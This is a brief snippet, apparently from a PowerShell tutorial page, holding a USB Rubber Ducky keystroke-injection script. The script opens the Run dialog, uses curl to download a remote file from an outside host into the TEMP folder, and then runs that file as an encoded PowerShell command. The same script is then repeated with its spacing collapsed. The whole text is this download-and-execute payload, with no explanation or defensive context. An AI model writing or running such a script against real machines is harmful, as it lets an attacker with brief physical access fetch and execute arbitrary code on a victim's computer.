PowerShell, Rubber Ducky scripts PowerShell DELAY 3000 GUI r DELAY 100 STRING powershell -NoProfile -Command "curl.exe -sS -L 'https://www.jesusninoc.com/cucu.ps1' -o (Join-Path $env:TEMP 'cucu.txt')"; DELAY 100 STRING powershell -e (gc $env:TEMP\cucu.txt) ENTER 1234567 DELAY 3000GUI rDELAY 100STRING powershell -NoProfile -Command "curl.exe -sS -L 'https://www.jesusninoc.com/cucu.ps1' -o (Join-Path $env:TEMP 'cucu.txt')";DELAY 100STRING powershell -e (gc $env:TEMP\cucu.txt)ENTER